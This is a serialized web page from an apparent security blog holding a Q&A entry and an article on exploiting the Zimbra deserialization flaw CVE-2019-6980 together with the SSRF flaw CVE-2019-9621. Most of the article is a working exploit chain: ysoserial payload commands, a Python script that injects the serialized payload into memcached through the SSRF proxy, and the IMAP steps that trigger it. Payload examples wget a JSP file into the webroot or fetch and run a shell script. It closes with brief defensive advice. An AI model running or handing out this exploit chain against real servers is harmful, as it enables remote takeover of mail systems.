[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGiW4DMCCfnF_XVuILQdyheYf_d6YVzT7kPLGDzvB6kM":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":50,"createdAt":50,"_status":49},755,"What are the prerequisites for exploiting CVE-2019-6980?","Exploitation requires the Zimbra server to be running a vulnerable version (8.7.x to 8.8.11) and the IMAP‑SSL port (993) to be accessible. In the common scenario, an SSRF vulnerability (CVE-2019-9621) is needed to set the `zimbraMemcachedClientServerList` to `127.0.0.1` and then inject the payload into the local memcached service. If SSRF is not present, the attacker must already have plaintext credentials and direct access to memcached port 11211, which is much more restrictive. See the [setting up Zimbra vulnerability debugging environment](\u002Fnews\u002Fsetting-up-zimbra-vulnerability-debugging-environment) for assistance in reproducing the vulnerability locally.","\u003Cp>Exploitation requires the Zimbra server to be running a vulnerable version (8.7.x to 8.8.11) and the IMAP‑SSL port (993) to be accessible. In the common scenario, an SSRF vulnerability (CVE-2019-9621) is needed to set the `zimbraMemcachedClientServerList` to `127.0.0.1` and then inject the payload into the local memcached service. If SSRF is not present, the attacker must already have plaintext credentials and direct access to memcached port 11211, which is much more restrictive. See the [setting up Zimbra vulnerability debugging environment](\u002Fnews\u002Fsetting-up-zimbra-vulnerability-debugging-environment) for assistance in reproducing the vulnerability locally.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fzimbra-deserialization-vulnerability-cve-2019-6980-exploitation-test\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-prerequisites-for-exploiting-cve-2019-6980-1777482001735","prerequisites, IMAP-SSL, SSRF, CVE-2019-9621, memcached, credentials, Zimbra exploitation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":46,"updatedAt":47,"createdAt":48,"_status":49},186,"Zimbra Deserialization Vulnerability (CVE-2019-6980) Exploitation Test","zimbra-deserialization-vulnerability-cve-2019-6980-exploitation-test","Step-by-step guide to exploit Zimbra CVE-2019-6980 deserialization vulnerability for remote code execution. Includes environment setup, payload generation, and open-source exploit script.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Zimbra deserialization vulnerability (CVE-2019-6980) affects Zimbra mail servers from version 8.7.x to 8.8.11 and is a remote code execution vulnerability.\u003C\u002Fp>\u003Cp>Considering that more than two years have passed since the patch was publicly released and there is no complete available POC, this article will document the testing process from a technical research perspective, open-source the exploitation script, and share the details.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Local vulnerability reproduction\u003C\u002Fli>\u003Cli>Practical exploitation analysis\u003C\u002Fli>\u003Cli>Open-source exploitation script\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Local Vulnerability Reproduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.tint0.com\u002F2019\u002F03\u002Fa-saga-of-code-executions-on-zimbra.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.csdn.net\u002Ffnmsd\u002Farticle\u002Fdetails\u002F89235589?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&amp;dist_request_id=1328603.11954.16149289993579653&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control\u003C\u002Fp>\u003Ch4>(1) Environment Setup\u003C\u002Fh4>\u003Cp>Select a Zimbra mail server version matching the vulnerability, download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.zimbra.com\u002Fdownloads\u002Fzimbra-collaboration-open-source\u002Farchives\u002F\u003C\u002Fp>\u003Cp>For specific setup process, refer to other materials\u003C\u002Fp>\u003Ch4>(2) Create User\u003C\u002Fh4>\u003Cp>Create a test user test1, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov ca test1@test.zimbra.com Password123 displayName\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The result returns the zimbraId corresponding to test user test1, format: 11111111-1111-1111-1111-111111111111\u003C\u002Fp>\u003Cp>\u003Cstrong>Supplement: Other common commands\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Reference: https:\u002F\u002Fwiki.zimbra.com\u002Fwiki\u002FZmprov\u003C\u002Fp>\u003Cp>List all users:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov -l gaa\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>List all administrator users:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov gaaa\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View the zimbraId corresponding to user test1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov ga test1 zimbraId\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Modify server configuration\u003C\u002Fh4>\u003Cp>List all servers:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov gad\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the server name test.zimbra.com\u003C\u002Fp>\u003Cp>View configuration information zimbraMemcachedClientServerList:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov gs test.zimbra.com zimbraMemcachedClientServerList\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Default return result is empty\u003C\u002Fp>\u003Cp>Set the value of zimbraMemcachedClientServerList to 127.0.0.1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov ms test.zimbra.com zimbraMemcachedClientServerList 127.0.0.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(4) Restart Zimbra\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmcontrol restart\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Restart Zimbra is required for the first modification of zimbraMemcachedClientServerList\u003C\u002Fp>\u003Cp>If it's not the first modification of zimbraMemcachedClientServerList, execute the ReloadMemcachedClientConfig command after setting:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Fzimbra\u002Fbin\u002Fzmprov rmcc all\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) Generate Payload\u003C\u002Fh4>\u003Cp>ysoserial is required here\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fbin\u002Ftouch \u002Ftmp\u002Ftest12345\" &gt; test.obj\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(6) Log in to test user test1 and obtain Cookie\u003C\u002Fh4>\u003Cp>Log in to test user test1 via browser, retrieve the login Cookie, information as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>0_8ef6794c8d0d991add9ebd717c09e7f7b69b8d76_69641d11161a19166611181165102d161411172d146218192d626611662d1516641717156217621062651b6578701d11111a111611111718161114121117161b76761d111a101b747970651d161a7a696d6272611b7469641d191a1211171011181914121b76657271696f6e1d11111a182e162e105f47415f111115111b617172661d111a111b;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(7) Send Payload\u003C\u002Fh4>\u003Cp>Python2.7 is required here\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Python3 requires consideration of byte array type conversion\u003C\u002Fp>\u003Cp>Python2.7 code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import requests\u003Cbr>from requests.packages.urllib3.exceptions import InsecureRequestWarning\u003Cbr>requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\u003Cbr>\u003Cbr>accountid = \"11111111-1111-1111-1111-111111111111\"\u003Cbr>folderNo= 2\u003Cbr>modseq = 1\u003Cbr>uidvalidity = 1\u003Cbr>cacheKey =\"zmImap:{accountId}:{folderNo}:{modseq}:{uidvalidity}\".format(accountId=accountid,folderNo=str(folderNo),modseq=str(modseq),uidvalidity=str(uidvalidity))\u003Cbr>print(cacheKey)\u003Cbr>with open(r\"test.obj\",\"rb\") as f:\u003Cbr>    payload = f.read()\u003Cbr>\u003Cbr>set_command = b\"set {cacheKey} 2048 3600 {payloadsize}\\r\\n\".format(cacheKey=cacheKey,payloadsize=str(len(payload)))+payload+\"\\r\\n\"\u003Cbr>\u003Cbr>headers = {\u003Cbr>    \"Cookie\":\"ZM_ADMIN_AUTH_TOKEN=0_8ef6794c8d0d991add9ebd717c09e7f7b69b8d76_69641d11161a19166611181165102d161411172d146218192d626611662d1516641717156217621062651b6578701d11111a111611111718161114121117161b76761d111a101b747970651d161a7a696d6272611b7469641d191a1211171011181914121b76657271696f6e1d11111a182e162e105f47415f111115111b617172661d111a111b\",\u003Cbr>    \"host\":\"foo:7071\"\u003Cbr>}\u003Cbr>r = requests.post(\"https:\u002F\u002F192.168.1.1\u002Fservice\u002Fproxy?target=http:\u002F\u002F127.0.0.1:11211\", data=set_command, headers=headers, verify=False)\u003Cbr>print r.text\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above code is modified from \"Zimbra SSRF+Memcached+Deserialization Vulnerability Exploitation Reproduction\"\u003C\u002Fp>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>accountid: corresponds to zimbraId\u003C\u002Fli>\u003Cli>folderNo: 2 represents inbox\u003C\u002Fli>\u003Cli>modseq: for new users, defaults to 1\u003C\u002Fli>\u003Cli>uidvalidity: for new users, defaults to 1\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Code details:\u003C\u002Fp>\u003Cp>Here, Cookie information needs to be added. Fill in the token after ordinary user login, set the name as ZM_ADMIN_AUTH_TOKEN. The request address is https:\u002F\u002F192.168.1.1\u002Fservice\u002Fproxy?target=http:\u002F\u002F127.0.0.1:11211. This is to use the SSRF (CVE-2019-9621) vulnerability to ultimately send data to port 11211.\u003C\u002Fp>\u003Cp>Typically, Zimbra does not expose port 11211 externally. However, if it is open, the above code can be modified to directly access port 11211, no longer requiring the SSRF (CVE-2019-9621) vulnerability.\u003C\u002Fp>\u003Ch4>(8) Trigger deserialization to execute code\u003C\u002Fh4>\u003Cp>Use nc to log in to the test user test1 via imap-ssl protocol, access the inbox, and trigger the vulnerability.\u003C\u002Fp>\u003Cp>The commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ncat --ssl 192.168.1.1 993\u003Cbr>a001 login test1@test.zimbra.com Password123\u003Cbr>a001 select inbox\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Practical Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Applicable Conditions\u003C\u002Fh3>\u003Cp>Can be divided into the following two scenarios:\u003C\u002Fp>\u003Ch4>(1) Zimbra server version is 8.7.x to 8.8.11\u003C\u002Fh4>\u003Cp>Able to access the imap-ssl port (default 993)\u003C\u002Fp>\u003Cp>Presence of SSRF (CVE-2019-9621) vulnerability\u003C\u002Fp>\u003Cp>If the server has not configured zimbraMemcachedClientServerList, it needs to be set to 127.0.0.1 via the SSRF (CVE-2019-9621) vulnerability and wait for Zimbra to restart\u003C\u002Fp>\u003Ch4>(2) Zimbra server version is 8.7.x to 8.8.11\u003C\u002Fh4>\u003Cp>Must be able to access the imap-ssl port (default 993)\u003C\u002Fp>\u003Cp>Absence of SSRF (CVE-2019-9621) vulnerability\u003C\u002Fp>\u003Cp>Need to obtain a user credential (plaintext password)\u003C\u002Fp>\u003Cp>Need to be able to access port 11211\u003C\u002Fp>\u003Cp>The value of zimbraMemcachedClientServerList needs to be set to 127.0.0.1\u003C\u002Fp>\u003Cp>The second scenario is too restrictive; usually it's the first scenario, so next we'll introduce the exploitation method in conjunction with the SSRF (CVE-2019-9621) vulnerability\u003C\u002Fp>\u003Ch3>2. Exploitation Process\u003C\u002Fh3>\u003Cp>The exploitation of the SSRF (CVE-2019-9621) vulnerability can use the previously open-source script Zimbra_SOAP_API_Manage.py\u003C\u002Fp>\u003Ch4>(1) Create User\u003C\u002Fh4>\u003Cp>Use the command CreateAccountSSRF to create a new user\u003C\u002Fp>\u003Ch4>(2) View Configuration\u003C\u002Fh4>\u003Cp>Use the command GetMemcachedClientConfigSSRF to obtain zimbraMemcachedClientServerList; if the result is not 127.0.0.1, it needs to be reset\u003C\u002Fp>\u003Ch4>(3) Set zimbraMemcachedClientServerList\u003C\u002Fh4>\u003Cp>Use the command GetServerSSRF to obtain the ServerID, to be used as a parameter\u003C\u002Fp>\u003Cp>Use the command ModifyServerSSRF to modify the configuration, with the name zimbraMemcachedClientServerList and the value 127.0.0.1\u003C\u002Fp>\u003Ch4>(4) Reload\u003C\u002Fh4>\u003Cp>Use the command ReloadMemcachedClientConfigSSRF to make the modification take effect\u003C\u002Fp>\u003Ch4>(5) Generate Payload\u003C\u002Fh4>\u003Cp>Use the MozillaRhino2 feature in ysoserial\u003C\u002Fp>\u003Cp>MozillaRhino2 implements execution of Linux commands via the exec() method in its code. Note that the exec() method cannot execute commands containing special characters, such as | &gt;\u003C\u002Fp>\u003Cp>That is to say, file write operations cannot be achieved via special characters like &gt;\u003C\u002Fp>\u003Cp>Here, the wget command can be used instead\u003C\u002Fp>\u003Cp>Command Example 1: Directly download a jsp file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fusr\u002Fbin\u002Fwget https:\u002F\u002F192.168.1.1\u002Ftest.jsp --no-check-certificate -O \u002Fopt\u002Fzimbra\u002Fjetty\u002Fwebapps\u002Fzimbra\u002Fpublic\u002Ftest.jsp\" &gt; payload.obj\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command Example 2: Download an sh script, then execute it\u003C\u002Fp>\u003Cp>The content of test.sh is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#!\u002Fbin\u002Fsh\u003Cbr>PATH=\u002Fbin:\u002Fsbin:\u002Fusr\u002Fbin:\u002Fusr\u002Fsbin:\u002Fusr\u002Flocal\u002Fbin:\u002Fusr\u002Flocal\u002Fgit\u002Fbin:\u002Fusr\u002Flocal\u002Fsbin:~\u002Fbin\u003Cbr>echo $PWD &gt;\u002Ftmp\u002Ftest\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to generate Payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fusr\u002Fbin\u002Fwget https:\u002F\u002F192.168.1.1\u002Ftest.sh --no-check-certificate -O \u002Ftmp\u002Ftest.sh\" &gt; payload.obj\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>java -jar ysoserial.jar MozillaRhino2 \"\u002Fbin\u002Fsh \u002Ftmp\u002Ftest.sh\" &gt; payload.obj\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(6) Execute script Zimbra_deserialization_RCE(CVE-2019-6980).py\u003C\u002Fh4>\u003Cp>Zimbra_deserialization_RCE(CVE-2019-6980).py automatically performs the following operations:\u003C\u002Fp>\u003Cul>\u003Cli>Log in as a user to obtain a Cookie\u003C\u002Fli>\u003Cli>Obtain the user's corresponding zimbraId via GetAccountInfoRequest\u003C\u002Fli>\u003Cli>Send Payload to port 11211 via the SSRF (CVE-2019-9621) vulnerability\u003C\u002Fli>\u003Cli>Log in as the user using the imap-ssl protocol, access the inbox, trigger the deserialization vulnerability, and execute code\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project).py\u003C\u002Fp>\u003Cp>It should be noted here that when Python uses imaplib to implement the imap-ssl protocol, it can obtain the uidvalidity value but cannot obtain the modseq value\u003C\u002Fp>\u003Ch2>0x04 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Upgrade the version, install patches\u003C\u002Fp>\u003Cp>Prohibit external access to port 11211\u003C\u002Fp>\u003Cp>Prohibit external access to port 7071\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the testing process of the Zimbra deserialization vulnerability (CVE-2019-6980), the open-source exploit script Zimbra_deserialization_RCE(CVE-2019-6980).py, and shares the details.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",5,"published","2026-02-02T07:38:21.200Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"Zimbra CVE-2019-6980 Exploit: RCE Vulnerability Testing Guide","Zimbra deserialization vulnerability, CVE-2019-6980, remote code execution, exploit script, security testing, Zimbra RCE, vulnerability reproduction, memcached exploit",false,[],{"docs":41,"hasNextPage":38},[42,43,44,4,45],758,757,756,754,{"title":30,"description":30,"image":30},"2026-07-24T02:07:19.494Z","2026-07-23T16:02:03.333Z","draft","2026-07-23T16:14:34.181Z"]